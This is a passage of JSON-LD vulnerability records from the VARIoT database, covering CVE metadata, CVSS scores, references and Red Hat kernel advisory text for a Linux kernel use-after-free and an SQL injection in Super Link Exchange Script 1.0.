        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "db": "PACKETSTORM",
        "id": "155529"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "157755"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19060"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "date": "2019-11-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "date": "2019-12-03T14:22:22",
        "db": "PACKETSTORM",
        "id": "155529"
      },
      {
        "date": "2020-01-07T16:46:38",
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "date": "2020-05-19T14:38:51",
        "db": "PACKETSTORM",
        "id": "157755"
      },
      {
        "date": "2019-11-18T06:15:12.343000",
        "db": "NVD",
        "id": "CVE-2019-19060"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151469"
      },
      {
        "date": "2022-11-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19060"
      },
      {
        "date": "2019-11-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      },
      {
        "date": "2023-01-19T20:08:01.737000",
        "db": "NVD",
        "id": "CVE-2019-19060"
      },
      {
        "date": "2020-08-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerable to resource exhaustion",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011971"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1081"
      }
    ],
    "trust": 0.6
  }
}

var-200702-0154
Vulnerability from variot

SQL injection vulnerability in directory.php in Super Link Exchange Script 1.0 might allow remote attackers to execute arbitrary SQL queries via the cat parameter

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200702-0154",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "super link exchange script",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "super link exchange script",
        "version": "1.0"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.6,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "bsdos",
        "scope": null,
        "trust": 0.6,
        "vendor": "windriver",
        "version": null
      },
      {
        "model": "link exchange script super link exchange script",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "super",
        "version": "1.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "82138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.4.9:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:hp:hp-ux:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_95:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:os2:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:gold:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:santa_cruz_operation:sco_unix:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:sp2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:sun:solaris:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:windriver:bsdos:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:hp:tru64:5.1b_pk2_bl22:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:aix:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:super_link_exchange_script:super_link_exchange_script:1.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "82138"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2006-7034",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2006-7034",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-23142",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2006-7034",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200702-415",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-23142",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-23142"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection vulnerability in directory.php in Super Link Exchange Script 1.0 might allow remote attackers to execute arbitrary SQL queries via the cat parameter",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "db": "BID",
        "id": "82138"
      },
      {
        "db": "VULHUB",
        "id": "VHN-23142"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2006-7034",
        "trust": 2.8
      },
      {
        "db": "SREASON",
        "id": "2285",
        "trust": 2.0
      },
      {
        "db": "XF",
        "id": "26720",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415",
        "trust": 0.7
      },
      {
        "db": "BUGTRAQ",
        "id": "20060525 SUPER LINK EXCHANGE SCRIPT V1.0",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "82138",
        "trust": 0.4
      },
      {
        "db": "VULHUB",
        "id": "VHN-23142",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-23142"
      },
      {
        "db": "BID",
        "id": "82138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ]
  },
  "id": "VAR-200702-0154",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-23142"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:10:29.636000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Super Link Exchange Script",
        "trust": 0.8,
        "url": "http://webscripts.softpedia.com/script/link-indeing/super-link-exchange-script-41958.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://securityreason.com/securityalert/2285"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/435166/30/4680/threaded"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26720"
      },
      {
        "trust": 0.9,
        "url": "http://xforce.iss.net/xforce/xfdb/26720"
      },
      {
        "trust": 0.9,
        "url": "http://www.securityfocus.com/archive/1/archive/1/435166/30/4680/threaded"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-7034"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-7034"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-23142"
      },
      {
        "db": "BID",
        "id": "82138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-23142"
      },
      {
        "db": "BID",
        "id": "82138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-02-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-23142"
      },
      {
        "date": "2007-02-22T00:00:00",
        "db": "BID",
        "id": "82138"
      },
      {
        "date": "2012-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "date": "2007-02-23T03:28:00",
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "date": "2007-02-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-23142"
      },
      {
        "date": "2007-02-22T00:00:00",
        "db": "BID",
        "id": "82138"
      },
      {
        "date": "2012-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      },
      {
        "date": "2018-10-16T16:29:19.600000",
        "db": "NVD",
        "id": "CVE-2006-7034"
      },
      {
        "date": "2007-05-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Super Link Exchange Script of  directory.php In  SQL Injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004849"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200702-415"
      }
    ],
    "trust": 0.6
  }
}

var-202011-0423
Vulnerability from variot

Use-after-free vulnerability in fs/block_dev.c in the Linux kernel before 5.8 allows local users to gain privileges or cause a denial of service by leveraging improper access to a certain error field. Linux Kernel Exists in a vulnerability related to the use of freed memory.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state.

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.

Bug fix:

  • RHACM 2.0.8 images (BZ #1915461)

  • Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1915461 - RHACM 2.0.8 images 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation

  1. 7.6) - ppc64, ppc64le, x86_64

Bug Fix(es):

  • [infiniband] Backport Request to fix Multicast Sendonly joins (BZ#1937820)

  • Bugs fixed (https://bugzilla.redhat.com/):

1899804 - CVE-2020-28374 kernel: SCSI target (LIO) write to any block on ILO backstore 1901168 - CVE-2020-15436 kernel: use-after-free in fs/block_dev.c 1930078 - CVE-2021-27365 kernel: heap buffer overflow in the iSCSI subsystem 1930079 - CVE-2021-27363 kernel: iscsi: unrestricted access to sessions and handles 1930080 - CVE-2021-27364 kernel: out-of-bounds read in libiscsi module

  1. 7) - noarch, x86_64

Bug Fix(es):

  • kernel-rt: update to the latest RHEL7.9.z3 source tree (BZ#1906133)

  • [kernel-rt] WARNING: CPU: 8 PID: 586 at kernel/sched/core.c:3644 migrate_enable+0x15f/0x210 (BZ#1916123)

  • [kernel-rt-debug] [ BUG: bad unlock balance detected! ] [RHEL-7.9.z] (BZ#1916130)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:0336-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:0336 Issue date: 2021-02-02 CVE Names: CVE-2020-15436 CVE-2020-35513 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • kernel: use-after-free in fs/block_dev.c (CVE-2020-15436)

  • kernel: Nfsd failure to clear umask after processing an open or create (CVE-2020-35513)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • double free issue in filelayout_alloc_commit_info (BZ#1679980)

  • Regression: Plantronics Device SHS2355-11 PTT button does not work after update to 7.7 (BZ#1769502)

  • Openstack network node reports unregister_netdevice: waiting for qr-3cec0c92-9a to become free. Usage count = 1 (BZ#1809519)

  • dlm: add ability to interrupt waiting for acquire POSIX lock (BZ#1826858)

  • [Azure][RHEL7] soft lockups and performance loss occurring during final fsync with parallel dd writes to xfs filesystem in azure instance (BZ#1859364)

  • Guest crashed when hotplug vcpus on booting kernel stage (BZ#1866138)

  • soft lockup occurs while a thread group leader is waiting on tasklist_waiters in mm_update_next_owner() where a huge number of the thread group members are exiting and trying to take the tasklist_lock. (BZ#1872110)

  • [DELL EMC 7.6 BUG] Kioxia CM6 NVMe drive fails to enumerate (BZ#1883403)

  • [Hyper-V][RHEL7] Request to included a commit that adds a timeout to vmbus_wait_for_unload (BZ#1888979)

  • Unable to discover the LUNs from new storage port (BZ#1889311)

  • RHEL 7.9 Kernel panic at ceph_put_snap_realm+0x21 (BZ#1890386)

  • A hard lockup occurrs where one task is looping in an sk_lock spinlock that has been taken by another task running timespec64_add_ns(). (BZ#1890911)

  • ethtool/mlx5_core provides incorrect SFP module info (BZ#1896756)

  • RHEL7.7 - zcrypt: Fix ZCRYPT_PERDEV_REQCNT ioctl (BZ#1896826)

  • RHEL7.7 - s390/dasd: Fix zero write for FBA devices (BZ#1896839)

  • [Azure]IP forwarding issue in netvsc[7.9.z] (BZ#1898280)

  • Security patch for CVE-2020-25212 breaks directory listings via 'ls' on NFS V4.2 shares mounted with selinux enabled labels (BZ#1917504)

Enhancement(s):

  • RFE : handle better ERRbaduid on SMB1 (BZ#1847041)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1901168 - CVE-2020-15436 kernel: use-after-free in fs/block_dev.c 1905208 - CVE-2020-35513 kernel: fix nfsd failure to clear umask after processing an open or create [rhel-7] 1911309 - CVE-2020-35513 kernel: Nfsd failure to clear umask after processing an open or create 1917504 - Security patch for CVE-2020-25212 breaks directory listings via 'ls' on NFS V4.2 shares mounted with selinux enabled labels

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1160.15.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm kernel-doc-3.10.0-1160.15.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.15.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.15.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.15.2.el7.x86_64.rpm perf-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.15.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.15.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-1160.15.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.15.2.el7.noarch.rpm kernel-doc-3.10.0-1160.15.2.el7.noarch.rpm

